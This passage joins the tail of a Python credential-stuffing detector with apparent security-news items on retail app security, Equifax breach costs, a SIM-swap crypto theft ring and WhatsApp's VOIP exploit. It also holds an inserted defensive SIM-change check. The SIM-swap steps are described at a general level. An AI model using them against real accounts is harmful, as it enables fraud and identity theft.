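            qualifies = (attempts >= MIN_ATTEMPTS
                         and len(users) >= MIN_DISTINCT_USERS
                         and fails / attempts >= MIN_FAIL_RATIO)
            if qualifies and (ip not in flagged or attempts > flagged[ip]["attempts"]):
                flagged[ip] = {
                    "attempts": attempts,
                    "distinct_users": len(users),
                    "fail_ratio": round(fails / attempts, 2),
                    # Successes inside a stuffing burst are the accounts that
                    # need a forced password reset and session revocation.
                    "compromised": sorted(u for _, u, ok in window if ok),
                }
    return flagged


if __name__ == "__main__":
    for ip, stats in detect_stuffing(parse(SAMPLE_LOG)).items():
        print(ip, stats)
```

The second source in the sample (198.51.100.7) fails twice on one account and then succeeds, which is the legitimate-user case the distinct-user threshold is there to exclude; the "compromised" list is the actionable output, since those are the accounts whose reused passwords just matched.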

Insecure web applications continue to plague e-commerce businesses because retailers limit their application security efforts and often overlook the most obvious risks and threats, said Ilia Kolochenko, founder and CEO of ImmuniWeb. “Cyber-criminals will now increasingly target retailers from developed countries within the APAC region, as Western retailers are better protected and are also suffering from an economic slowdown.

“Application security should start with a holistic inventory and risk assessment to enable well-informed decisions. Afterwards, continuous security monitoring is vital to ensure agile development processes and timely addressing of any new security and privacy issues.”

Equifax Has Spent Nearly $1.4bn on Breach Costs

Equifax has incurred losses so far of over $1.35bn from a devastating 2017 breach which affected more than half of all Americans and millions of UK consumers, the firm revealed in its latest financials.

The credit agency claimed in its Q1 2019 earnings statement that the figure “related to the incident, incremental technology and data security costs, and an accrual for losses associated with legal proceedings and investigations.”

The firm has recouped the maximum possible $125m, minus $7.5m, from an insurance policy, and claims that breach costs for the rest of this year will be less than those for 2018.

However, the first three months of 2019 saw the company shell out $82.8m for “technology and data security,” $12.5m for “legal and investigative fees,” and $1.5m for product liability. The largest sum ($690m) was listed as “accrual for legal matters” related to the 2017 breach.

As well as the $786.8m listed for Q1 2019, the firm detailed $68.7m it spent in Q1 2018.

Its technology and data costs “include incremental costs to transform our technology infrastructure and improve application, network, data security, and the costs of development and launch of Lock and Alert,” it explained. These include people, services and direct product costs.

The legal costs relate to payments to lawyers and professional services companies to investigate the incident and respond to legal, government, and regulatory investigations and claims. Product liability costs relate to its paying for free credit monitoring for customers.

The latest revelations can be seen as a cautionary tale of what happens when organizations fail to implement adequate cybersecurity.

The 2017 breach itself stemmed from exploitation of a known Apache Struts 2 flaw which was left unpatched. The subsequent exfiltration of data over several months compromised highly sensitive credit and personal information on over half of all American adults (148m) and 15 million UK consumers, as well as around 20,000 Canadians.

Although the UK’s ICO fined the firm the maximum £500,000 under the old regime, Equifax could have been hit with a penalty orders of magnitude greater if the incident had occurred after May 2018, when the GDPR came into effect.

Nine Charged in $2m SIM Swap Conspiracy

Nine men have been charged for their alleged role in a major SIM swapping operation designed to bypass log-in security to steal millions in cryptocurrency from their victims.

Dubbed “The Community” by investigators, the group of individuals in their teens and 20s includes six alleged cyber-criminals and three former employees of mobile phone companies who are said to have helped them.

The former are charged with conspiracy to commit wire fraud, wire fraud and aggravated identity theft, while the latter are charged with wire fraud in relation to the conspiracy.

They all hail from the US, apart from Conor Freeman, 20, of Dublin.

The SIM swapping conspiracy they are said to have been involved in will be familiar to industry watchers.

First, the group gains control of a victim’s mobile phone number, either by bribing an employee of a carrier, or posing as the victim and tricking a customer service operative into swapping the number to a SIM controlled by the group.

They then use control of the phone number to unlock digital currency accounts, for example by intercepting the 2FA codes often sent by SMS.
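The two steps above work because the service treats possession of a phone number as proof of identity. The defensive counterpart, as an added example that is not code from the article, the prosecutors or any exchange, is a step-up policy that never falls back to SMS when a stronger factor is enrolled and that treats a number whose SIM changed recently as unable to vouch for its holder. Carriers expose SIM-change lookups in varying ways; `SIM_CHANGE_LOG` and `last_sim_change` below are a constructed stand-in for such a lookup, and the quarantine window and value threshold are assumptions.

```python
"""Step-up policy that refuses to trust an SMS code right after a SIM change.

Added example. The SIM-change table is a constructed stand-in for a carrier
lookup; the 7-day quarantine and the $1000 threshold are assumptions.
"""
from datetime import datetime, timedelta

SIM_CHANGE_QUARANTINE = timedelta(days=7)  # assumption: recent swaps are suspect
HIGH_VALUE_USD = 1000                       # assumption: withdrawals above this step up

# Constructed stand-in for a carrier SIM-change lookup: number -> last change.
SIM_CHANGE_LOG = {
    "+15550100": datetime(2019, 1, 3),   # changed months before NOW
    "+15550101": datetime(2019, 5, 9),   # changed the day before NOW
}
NOW = datetime(2019, 5, 10, 12, 0)


def last_sim_change(number):
    """Hypothetical carrier query: when was this number last moved to a new SIM?"""
    return SIM_CHANGE_LOG.get(number)


def decide(number, amount_usd, has_app_totp, now=NOW):
    """Return the second factor to demand for a withdrawal, or 'hold'.

    'totp' : authenticator-app code; SMS is not consulted at all
    'sms'  : SMS code acceptable (low value, no recent SIM change)
    'hold' : queue for manual review; the number alone cannot vouch for the caller
    """
    changed = last_sim_change(number)
    recent_swap = changed is not None and now - changed < SIM_CHANGE_QUARANTINE
    if has_app_totp:
        # Never downgrade to SMS when a device-bound factor exists: a swapped
        # SIM gives the attacker nothing here.
        return "totp"
    if amount_usd >= HIGH_VALUE_USD or recent_swap:
        # A freshly swapped SIM is exactly what the scheme above produces, and
        # a large transfer is what it is used for; do not let SMS authorise it.
        return "hold"
    return "sms"


if __name__ == "__main__":
    for args in [("+15550100", 50, False), ("+15550101", 50, False),
                 ("+15550100", 5000, False), ("+15550101", 5000, True)]:
        print(args, "->", decide(*args))
```

The quarantine check is only as good as the carrier signal behind it, so the other half of the policy matters as much: offering an app-based or hardware factor and, once a customer has enrolled one, refusing to accept SMS in its place even when the customer asks.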

The defendants are alleged to have executed seven attacks that resulted in the theft of cryptocurrency valued at around $2.4m.

“Mobile phones today are not only a means of communication but also a means of identification,” stated US attorney Matthew Schneider. “This case should serve as a reminder to all of us to protect our personal and financial information from those who seek to steal it.”

SIM swapping cases are becoming increasingly common. Last November, a Manhattan man was charged with allegedly stealing over $1m from various business executives.

In August last year, a US entrepreneur and cryptocurrency investor filed a $223m lawsuit against AT&T after a store employee allegedly helped fraudsters steal $24m of his digital funds, in another SIM swap attack.

WhatsApp Finds and Fixes Targeted Attack Bug

WhatsApp is urging its global users to update their app after fixing a serious remote code execution (RCE) vulnerability which was being exploited in a highly targeted attack, potentially by a nation state.

The Facebook-owned mobile comms giant, which has over 1.5 billion users, rolled out a fix on Friday for the buffer overflow vulnerability in the WhatsApp VOIP stack. It claimed the flaw allowed RCE “via specially crafted series of SRTCP packets sent to a target phone number.”

In effect, this means a user could be infected with the spyware payload simply by being phoned by the attacker. They don’t even have to pick up.

“The issue affects WhatsApp for Android prior to v2.19.134, WhatsApp Business for Android prior to v2.19.44, WhatsApp for iOS prior to v2.19.51, WhatsApp Business for iOS prior to v2.19.51, WhatsApp for Windows Phone prior to v2.18.348, and WhatsApp for Tizen prior to v2.18.15,” a technical note revealed.

WhatsApp’s own security team is said to have found the bug, although it has been reported that it was initially discovered and monetized by notorious Israeli firm NSO Group, whose Pegasus spyware has been sold to governments in the past to help them monitor individuals.

The firm refused to name who it suspected, saying only that it was the work of an “advanced cyber actor,” that attacks exploiting the flaw had targeted a “select number” of users, and that it bore “all the hallmarks” of a private firm that works with governments to deliver spyware targeting mobiles.

“WhatsApp encourages people to upgrade to the latest version of our app, as well as keep their mobile operating system up-to-date, to protect against potential targeted exploits designed to compromise information stored on mobile devices,” WhatsApp said in a statement sent to Infosecurity.

For its part, NSO Group reiterated in reports that its wares are only licensed to governments for the purpose of fighting crime and terror.

Chris Boyd, Malware Intelligence Analyst at Malwarebytes, argued the findings were “enormously worrying for anyone using WhatsApp on a phone alongside sensitive information.”

“The really impressive thing here is that the WhatsApp team discovered this attack at all, given no click to install is required,” he added.

WhatsApp has briefed NGOs to share any useful information, presumably to protect citizens from countries that may have been affected, and it has informed US law enforcers.